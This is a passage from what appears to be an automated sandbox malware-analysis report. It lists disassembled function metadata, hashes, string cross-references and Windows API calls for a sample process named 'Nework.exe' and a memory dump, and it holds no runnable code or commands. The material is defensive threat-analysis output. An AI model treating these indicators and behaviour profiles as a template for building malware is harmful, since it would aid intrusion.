Instruction Fuzzy Hash: 12E092B210D3409FD348DB34E80185ABBE4EFA1310F05887EE481C7291E731D941C7A5

Function 05FAE1FF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56d6ed0ab8920bcac255efb910f6158d8143bab36acc979389c15066240aff4f
Instruction ID: f635f901464e44f4429ec50973f2f5c0885024cd7fbe4d351959d11ff9d9051b
Opcode Fuzzy Hash: 56d6ed0ab8920bcac255efb910f6158d8143bab36acc979389c15066240aff4f
Instruction Fuzzy Hash: DEE0D871A45304FFCB41CF68A8415DD37B1EB86200B1081DAD409D7351D6340F108752

Function 05FAE280 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0af0245f4152c7dab23343c0a74f8805bedec0eccb0045255e7e078052de268
Instruction ID: 0bb0f6bf1b04c35571c6fc3d441b6c8107569b2e9e1c0ec43f3701705b14f569
Opcode Fuzzy Hash: e0af0245f4152c7dab23343c0a74f8805bedec0eccb0045255e7e078052de268
Instruction Fuzzy Hash: 45E0D8755057405FCB01F764FDD19957BA1F74B714B018245E4015B2A6CF780E49C7D5

Function 05FAAC80 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491183693c6dec5d938f2b26a5397648e69581998935b46b75d24d21c2e02c1d
Instruction ID: d6fa9751e45ce15ca48f24bd1a8b573f6e049b868362811787252fa11c26147e
Opcode Fuzzy Hash: 491183693c6dec5d938f2b26a5397648e69581998935b46b75d24d21c2e02c1d
Instruction Fuzzy Hash: B6D05E32302129678A057779F4184BE77FBEEC5A62304042AE60BC3240CF651D4287D6

Function 05FAE8F8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1a824d8861397c346a192c34df654bd95e04c5281227979dbed9027e7e2a24
Instruction ID: b0803613d8f9a0e733b64c3e4fe3be881f0766f5e42719bdf2c30dcf34487535
Opcode Fuzzy Hash: ef1a824d8861397c346a192c34df654bd95e04c5281227979dbed9027e7e2a24
Instruction Fuzzy Hash: 0BE01739225140AFCB029B64D940CB53F35FF9A61030884C6F1448F6B2C232CD25DB60

Function 05FAB510 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3ba42f36a85c363a71cdd6f4e9af8d38e134f3e3091f23ff6db4ed22c2872e
Instruction ID: 3f51a6bef4a8a5d9861deafbac206bb43d77898b693c195c2c671d90daee5739
Opcode Fuzzy Hash: 6c3ba42f36a85c363a71cdd6f4e9af8d38e134f3e3091f23ff6db4ed22c2872e
Instruction Fuzzy Hash: 56E09A75E0020CEFCB40DFE4D5448DDBBB9EB48200F1082A6D905A3300EB345B55DF80

Function 05FAE210 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb85037b09a9049df522d5c55b3f8e72139d689149a7d020eb95012f57d5a13a
Instruction ID: 566a3be60390ab97cd4b53c22200f65180b8cf5a0fb468f7a007d2f4b4f800c0
Opcode Fuzzy Hash: fb85037b09a9049df522d5c55b3f8e72139d689149a7d020eb95012f57d5a13a
Instruction Fuzzy Hash: 93D01772A0020CFFCB81EFA8E94199DB7B9EB85214B1081A9D509E7301EA312F009B91

Function 05FAF8EA Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d856585dc9de4b820fa1fff1822d175762fa0a4a112a852f33a4d65b938eb331
Instruction ID: 9fc9eb77676b0f7a5c3658bf4317372db75ee54a04fde524d1e27a3678adae19
Opcode Fuzzy Hash: d856585dc9de4b820fa1fff1822d175762fa0a4a112a852f33a4d65b938eb331
Instruction Fuzzy Hash: 93C012327000200B0A88A66C701027D76E7C2C82B3385862FE60EC7388CE60AD624788

Function 05FA3721 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081c7362ddc3fea0072806c958d768068bbe9d24e85b99846278a5b27c184664
Instruction ID: d35ad5640face604a4a87774265871f225d2e2ea1f83057f39aa909d54152776
Opcode Fuzzy Hash: 081c7362ddc3fea0072806c958d768068bbe9d24e85b99846278a5b27c184664
Instruction Fuzzy Hash: FCC09B756101019BE7045510BC07F653961E750785F550016B653C5045C7AD5854C565

Function 05FADFD1 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52757d402473b9b1aa9cd98f0833bcf9020526e39297ac6024aa39881adcb667
Instruction ID: a3024ea074f398ae8593b72a670ef2cdac3661e4913bb4b649245e11e72ea690
Opcode Fuzzy Hash: 52757d402473b9b1aa9cd98f0833bcf9020526e39297ac6024aa39881adcb667
Instruction Fuzzy Hash: BEC04C3158E6906EDB4607608C098853E16AB5673071540C6A7418A062955204058696

Non-executed Functions

Function 05FAE2C7 Relevance: 46.6, Strings: 37, Instructions: 391COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAE6D0
Di, xrefs: 05FAE431
Di, xrefs: 05FAE353
Di, xrefs: 05FAE6F8
Di, xrefs: 05FAE40C
Di, xrefs: 05FAE658
Di, xrefs: 05FAE7EE
Di, xrefs: 05FAE456
Di, xrefs: 05FAE4F3
Di, xrefs: 05FAE39D
Di, xrefs: 05FAE720
Di, xrefs: 05FAE7C3
Di, xrefs: 05FAE748
Di, xrefs: 05FAE543
Di, xrefs: 05FAE51B
Di, xrefs: 05FAE3C2
Di, xrefs: 05FAE844
Di, xrefs: 05FAE4CB
Di, xrefs: 05FAE770
Di, xrefs: 05FAE309
Di, xrefs: 05FAE47B
Di, xrefs: 05FAE378
Di, xrefs: 05FAE86F
Di, xrefs: 05FAE2E4
Di, xrefs: 05FAE4A3
Di, xrefs: 05FAE32E
Di, xrefs: 05FAE630
Di, xrefs: 05FAE5BB
Di, xrefs: 05FAE593
Di, xrefs: 05FAE56B
Di, xrefs: 05FAE680
Di, xrefs: 05FAE608
Di, xrefs: 05FAE5E3
Di, xrefs: 05FAE3E7
Di, xrefs: 05FAE798
Di, xrefs: 05FAE819
Di, xrefs: 05FAE6A8

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-221844820
Opcode ID: e32a548cad65b82c91b52bc5817f23c9164c650a91ca696298557460fc5bc866
Instruction ID: f5c40fddd7296c20e39971f73f9f9621fbac14e9a0fc52161468e5bb253500a0
Opcode Fuzzy Hash: e32a548cad65b82c91b52bc5817f23c9164c650a91ca696298557460fc5bc866
Instruction Fuzzy Hash: 57D1AF35310F00AFDA06B6F4AD63ABDB696BBC6704BA0882CA1090F795DF712D1587D7

Function 05FAE2D8 Relevance: 46.6, Strings: 37, Instructions: 383COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAE6D0
Di, xrefs: 05FAE431
Di, xrefs: 05FAE353
Di, xrefs: 05FAE6F8
Di, xrefs: 05FAE40C
Di, xrefs: 05FAE658
Di, xrefs: 05FAE7EE
Di, xrefs: 05FAE456
Di, xrefs: 05FAE4F3
Di, xrefs: 05FAE39D
Di, xrefs: 05FAE720
Di, xrefs: 05FAE7C3
Di, xrefs: 05FAE748
Di, xrefs: 05FAE543
Di, xrefs: 05FAE51B
Di, xrefs: 05FAE3C2
Di, xrefs: 05FAE844
Di, xrefs: 05FAE4CB
Di, xrefs: 05FAE770
Di, xrefs: 05FAE309
Di, xrefs: 05FAE47B
Di, xrefs: 05FAE378
Di, xrefs: 05FAE86F
Di, xrefs: 05FAE2E4
Di, xrefs: 05FAE4A3
Di, xrefs: 05FAE32E
Di, xrefs: 05FAE630
Di, xrefs: 05FAE5BB
Di, xrefs: 05FAE593
Di, xrefs: 05FAE56B
Di, xrefs: 05FAE680
Di, xrefs: 05FAE608
Di, xrefs: 05FAE5E3
Di, xrefs: 05FAE3E7
Di, xrefs: 05FAE798
Di, xrefs: 05FAE819
Di, xrefs: 05FAE6A8

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-221844820
Opcode ID: e797a3a580a75bea992d4b1a48da95ec1e742b8f69b1865dafd18604e39d5b7d
Instruction ID: 1d90e02c1e70bd22ff35dab9937a3bca622e69a2c5466c498f9fb60e80a5b9cb
Opcode Fuzzy Hash: e797a3a580a75bea992d4b1a48da95ec1e742b8f69b1865dafd18604e39d5b7d
Instruction Fuzzy Hash: DED1AF35310F01ABDA06B6F4ED53ABDB692BBC6704BA0882CA1090F795DF712D1587C7

Function 05FACC7F Relevance: 16.4, Strings: 13, Instructions: 152COMMON

Download Yara Rule

Strings

Di, xrefs: 05FACC9C
Di, xrefs: 05FACE0E
Di, xrefs: 05FACDC4
Di, xrefs: 05FACD0B
Di, xrefs: 05FACDE9
Di, xrefs: 05FACCC1
Di, xrefs: 05FACD9F
Di, xrefs: 05FACD30
Di, xrefs: 05FACE58
Di, xrefs: 05FACE33
Di, xrefs: 05FACD7A
Di, xrefs: 05FACCE6
Di, xrefs: 05FACD55

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-2743657870
Opcode ID: c17db0d06b8ea9af9b577537adc22076589e6a4341b50ed79ccb5df1499c9418
Instruction ID: f158d64391094106ac8ed482c2c3f3cbb4cfe18428c195d1411f8985cdab7792
Opcode Fuzzy Hash: c17db0d06b8ea9af9b577537adc22076589e6a4341b50ed79ccb5df1499c9418
Instruction Fuzzy Hash: CF419135310F006FDA06B6F4AD43A7D76A6BBCA700BA0892CA2094F795DF712E0587D7

Function 05FACC90 Relevance: 16.4, Strings: 13, Instructions: 143COMMON

Download Yara Rule

Strings

Di, xrefs: 05FACC9C
Di, xrefs: 05FACE0E
Di, xrefs: 05FACDC4
Di, xrefs: 05FACD0B
Di, xrefs: 05FACDE9
Di, xrefs: 05FACCC1
Di, xrefs: 05FACD9F
Di, xrefs: 05FACD30
Di, xrefs: 05FACE58
Di, xrefs: 05FACE33
Di, xrefs: 05FACD7A
Di, xrefs: 05FACCE6
Di, xrefs: 05FACD55

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-2743657870
Opcode ID: 01d83cb579d1fcce032cc6ed246202f9f65b5d1d6d10e347dd2fa39caceb1e77
Instruction ID: d263d689c8ec6e662cdac15c468323b50f8eb0ba4057019915813dd16a79c0da
Opcode Fuzzy Hash: 01d83cb579d1fcce032cc6ed246202f9f65b5d1d6d10e347dd2fa39caceb1e77
Instruction Fuzzy Hash: 3241A235310F016BDA06B6F4ED4367D76A6BBCA700BA0883CA2090FB85CF712D058797

Function 05FACED1 Relevance: 10.1, Strings: 8, Instructions: 106COMMON

Download Yara Rule

Strings

Di, xrefs: 05FACFA5
Di, xrefs: 05FACFEF
Di, xrefs: 05FACFCA
Di, xrefs: 05FACF11
Di, xrefs: 05FACF5B
Di, xrefs: 05FACF80
Di, xrefs: 05FACF36
Di, xrefs: 05FACEEC

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-427482554
Opcode ID: 597293a9d22c1d70353fb97d24509da30969cb12225e71c590b540ae1a319624
Instruction ID: 71e019cd342097a0f94aa17833007c6621c3f5fa95f31057e19ffeae733987bb
Opcode Fuzzy Hash: 597293a9d22c1d70353fb97d24509da30969cb12225e71c590b540ae1a319624
Instruction Fuzzy Hash: 9B31D331310B116FEB02B6F4AD42A7DB6A6BBC6710BA0883CA2094F785CF712D0587D7

Function 05FACEE0 Relevance: 10.1, Strings: 8, Instructions: 93COMMON

Download Yara Rule

Strings

Di, xrefs: 05FACFA5
Di, xrefs: 05FACFEF
Di, xrefs: 05FACFCA
Di, xrefs: 05FACF11
Di, xrefs: 05FACF5B
Di, xrefs: 05FACF80
Di, xrefs: 05FACF36
Di, xrefs: 05FACEEC

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di$Di
API String ID: 0-427482554
Opcode ID: c03befc34dd0536240f053742e298fd41145c27dffef300f7b43a8f818c732d6
Instruction ID: 49e6450d2cfb9599636ca9e1cc78c9bf012aa123bcd1a1384bb930dad2746bc4
Opcode Fuzzy Hash: c03befc34dd0536240f053742e298fd41145c27dffef300f7b43a8f818c732d6
Instruction Fuzzy Hash: 2021A035310B116BDA06BAE4AD42A7DB6A6BBC6714BA0883CA2094F785CF713D0587D7

Function 05FAC968 Relevance: 8.8, Strings: 7, Instructions: 89COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAC9AD
Di, xrefs: 05FACA51
Di, xrefs: 05FACA28
Di, xrefs: 05FAC984
Di, xrefs: 05FACA7A
Di, xrefs: 05FAC9D6
Di, xrefs: 05FAC9FF

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1084884928
Opcode ID: 9c8b3c0ec1e2e922d9e40af68981a1c84040b8d0fa2c132d246491c68288b0b8
Instruction ID: e1915185bf6b3c093971fa2eca305100b8acac20a02e8a5e51c9537947b156ab
Opcode Fuzzy Hash: 9c8b3c0ec1e2e922d9e40af68981a1c84040b8d0fa2c132d246491c68288b0b8
Instruction Fuzzy Hash: EE319131300B9A6BDB022BB4EC569AD7B62BBC67047608528E1064F795CB715E4ACBC2

Function 05FAC978 Relevance: 8.8, Strings: 7, Instructions: 83COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAC9AD
Di, xrefs: 05FACA51
Di, xrefs: 05FACA28
Di, xrefs: 05FAC984
Di, xrefs: 05FACA7A
Di, xrefs: 05FAC9D6
Di, xrefs: 05FAC9FF

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di$Di
API String ID: 0-1084884928
Opcode ID: 3215467820ddc4bf9e5d6a269e04f4077a781693e3cb9ce5adeedef9cb428f28
Instruction ID: 7884124adea4ffc316fc27ca27dc11ed0eb09534471cc7315017fc7f8d2fbc9a
Opcode Fuzzy Hash: 3215467820ddc4bf9e5d6a269e04f4077a781693e3cb9ce5adeedef9cb428f28
Instruction Fuzzy Hash: 9F219131300A5A6BDF062BB4EC4686D7772FBC5700760842CE1064F795CF716E4A8BC2

Function 05FAD538 Relevance: 7.6, Strings: 6, Instructions: 84COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAD554
Di, xrefs: 05FAD60D
Di, xrefs: 05FAD579
Di, xrefs: 05FAD5C3
Di, xrefs: 05FAD59E
Di, xrefs: 05FAD5E8

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di
API String ID: 0-100505788
Opcode ID: 9cf40da81e89332f9cb5d57ce32dc5f2b59a07704fbb39b0476e281153e17e2e
Instruction ID: 6d8c45f3a9c561a081c084a8af2b35201e5ee0c0ecdb65a7054411ef864a7249
Opcode Fuzzy Hash: 9cf40da81e89332f9cb5d57ce32dc5f2b59a07704fbb39b0476e281153e17e2e
Instruction Fuzzy Hash: 7421B631310B106FDA0276E5AD52A7D7696FBC6714BA0892CE1094F785CF722D1587E3

Function 05FAD548 Relevance: 7.6, Strings: 6, Instructions: 73COMMON

Download Yara Rule

Strings

Di, xrefs: 05FAD554
Di, xrefs: 05FAD60D
Di, xrefs: 05FAD579
Di, xrefs: 05FAD5C3
Di, xrefs: 05FAD59E
Di, xrefs: 05FAD5E8

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: Di$Di$Di$Di$Di$Di
API String ID: 0-100505788
Opcode ID: 470d23ec8f79616f571615f2196aa4942eb86ac4cd4fd72ca8ad2a61e5375cd6
Instruction ID: fb9e1f1d5916636321441dc3951de99cbec0f69c3d02f14b61495c49ad954510
Opcode Fuzzy Hash: 470d23ec8f79616f571615f2196aa4942eb86ac4cd4fd72ca8ad2a61e5375cd6
Instruction Fuzzy Hash: 0111C631310B106FDA0276E5AD42A7DB697BBC5714BA0893CE1094F785CF722D1587D3

Analysis Process: Nework.exePID: 5596, Parent PID: 3212COMMON

Executed Functions

Function 0047A879 Relevance: 36.5, APIs: 15, Strings: 5, Instructions: 1503
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryA.KERNEL32(00000000,2AF27B5A,00000000), ref: 0047A87C

Strings

peM, xrefs: 0047AEBE
VUUU, xrefs: 0047ADF2
hT2M, xrefs: 0047A90E
ht3M, xrefs: 0047A8EB
@3P, xrefs: 0047B791

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU$hT2M$ht3M$peM
API String ID: 1611563598-3716873948
Opcode ID: 860da683b8003767ed6c8e280bb1639096117d62682ce48c5e0a026ed62b8899
Instruction ID: 5725c6d4493236688334932b87a4d66c13ae5ec2440dd4df891dd20a7baec845
Opcode Fuzzy Hash: 860da683b8003767ed6c8e280bb1639096117d62682ce48c5e0a026ed62b8899
Instruction Fuzzy Hash: DAC20571A002089FDB18DF28CD89BDDB7B5EF45304F10859EE50DA7291DB39AA84CF99

Function 00479870 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 668
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004789A0: GetTempPathA.KERNEL32(00000104,?,2AF27B5A,?,00000000), ref: 004789E7

GetFileAttributesA.KERNEL32(00000000), ref: 004798E3

Strings

$2M, xrefs: 0047A7E0

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID: $2M
API String ID: 3199926297-622354034
Opcode ID: 334eb376acac7b509829c17a1f2d22679169a94bb376192be5f06544f0af4e64
Instruction ID: 79e7022476f65779c2fb31b51ecd14f43913fbe95068c095b3b845b8b12635e0
Opcode Fuzzy Hash: 334eb376acac7b509829c17a1f2d22679169a94bb376192be5f06544f0af4e64
Instruction Fuzzy Hash: 5142D670900248DFEF14EBB8CA497DE7BB1AB46314F64865AD414773C2C7B94E44CBAA

Function 00477C40 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,2AF27B5A), ref: 00477CBA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00477D1B
GetProcAddress.KERNEL32(00000000), ref: 00477D22
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00477DE3
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00477DE7

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: db446a6b147f2f3a51dc2889265a7199dbcc58ba19579bf3b074597f9a2b4d6a
Instruction ID: 544959f589d3fb31300f3dffb823801fc4dc9a519507b06b713473b5cc6238e9
Opcode Fuzzy Hash: db446a6b147f2f3a51dc2889265a7199dbcc58ba19579bf3b074597f9a2b4d6a
Instruction Fuzzy Hash: C3D13870E00204ABDB14BB29DD5A7ED7B61EB42314F94829FE4196B3C2DB7C4E4187DA

Function 004A638B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,004A638A,?,?,?,?,?,004A73DE), ref: 004A63AD
TerminateProcess.KERNEL32(00000000,?,004A638A,?,?,?,?,?,004A73DE), ref: 004A63B4
ExitProcess.KERNEL32 ref: 004A63C6

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 2dd6035ca831d8708eb07fcde50f28c784908f45336b426172c2e74169109840
Instruction ID: 13c05532f288dc5de2552d99fd9e0d1296b9035b8efc6c10b4f3522d5e4ecab7
Opcode Fuzzy Hash: 2dd6035ca831d8708eb07fcde50f28c784908f45336b426172c2e74169109840
Instruction Fuzzy Hash: EAE0EC31000648EFCF516F55DD0DD5D7B69FB65745B094425FC0586231CB3ADDA2CB89

Function 0047B010 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0047B05D

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 8099ebdf191f85927189ff9aa3244fea393d94f08c370de63e897bac7d0ae354
